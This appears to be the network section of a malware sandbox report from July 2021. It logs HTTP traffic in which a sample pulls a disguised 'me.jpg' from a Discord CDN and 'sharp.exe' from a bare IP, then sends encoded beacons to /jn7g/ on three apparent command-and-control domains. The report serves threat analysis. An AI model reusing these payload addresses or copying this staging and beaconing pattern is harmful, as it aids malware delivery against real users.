Network Analysis

GET /attachments/858793322087710753/863898136854003722/me.jpg HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 23 Jul 2021 00:14:16 GMT Content-Type: image/jpeg Content-Length: 2026850 Connection: keep-alive CF-Ray: 6730b527dc166188-ICN Accept-Ranges: bytes Age: 27168 Cache-Control: public, max-age=31536000 ETag: "e97132f215dc8aac4459de2cdaa8a840" Expires: Sat, 23 Jul 2022 00:14:16 GMT Last-Modified: Sun, 11 Jul 2021 21:42:46 GMT CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Cf-Bgj: h2pri Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1626039766364734 x-goog-hash: crc32c=S/knww== x-goog-hash: md5=6XEy8hXciqxEWd4s2qioQA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 2026850 X-GUploader-UploadID: ADPycdslhFdVTcSBal6NIS6WPJqIu9zKQ_ovzCXOc9UGRgQ3RU_TqQmUuq6VYEh6pVm_w58Q6WmzG9tMiR2JNMCUWIX0YOnG8A X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FvmxdgXFGHOChM5uMxvNdmpXHLD2KgcuENIEir0B3Ci34a4JEuTzqk9Q9XhxYNy4dyYWfy9vbHJ%2BHqEbYvkrTwZKT37LqteikFSehRK%2BpJWh%2Fgyw0LEe9oj12vFnP%2BHjDQh3Pg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /d/sharp.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: 172.245.119.43 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 23 Jul 2021 00:14:13 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.21 Last-Modified: Tue, 20 Jul 2021 08:01:58 GMT ETag: "6800-5c78977da8e7b" Accept-Ranges: bytes Content-Length: 26624 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

GET /jn7g/?xVMtB8oh=f1txrUsdtgvlRZfFl/3qwcMnsDpxot63EHJ4FRyTveGHsTWl8LNXqx1DgUF91kvu8hbR5MKR&1bw=L6AdkJ8PtTAtvfC0 HTTP/1.1 Host: www.wanpoo1.com Connection: close

HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Jul 2021 00:14:52 GMT Content-Type: text/html Content-Length: 2814 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 08 May 2020 06:46:47 GMT ETag: "afe-5a51d5c7d6579"

GET /jn7g/?xVMtB8oh=LjSwbA7FwlWPZY8aZVplIy66ddjBjMzLn1RIC02GaXcy/I7AmoIAjniGIlflMFRohJW66HhH&1bw=L6AdkJ8PtTAtvfC0 HTTP/1.1 Host: www.salivasolve.com Connection: close

HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 23 Jul 2021 00:15:12 GMT Content-Type: text/html Content-Length: 275 ETag: "60f9a3a6-113" Via: 1.1 google Connection: close

GET /jn7g/?xVMtB8oh=rBF8etPQjoWBTHIpYleE6n5rMk1/4doO857OEMSviIYg2eKF3uhinNCweNEOV5ZmhoRIN+nm&1bw=L6AdkJ8PtTAtvfC0 HTTP/1.1 Host: www.formatohd.xyz Connection: close

HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Fri, 23 Jul 2021 00:15:51 GMT server: LiteSpeed location: https://www.formatohd.xyz/jn7g/?xVMtB8oh=rBF8etPQjoWBTHIpYleE6n5rMk1/4doO857OEMSviIYg2eKF3uhinNCweNEOV5ZmhoRIN+nm&1bw=L6AdkJ8PtTAtvfC0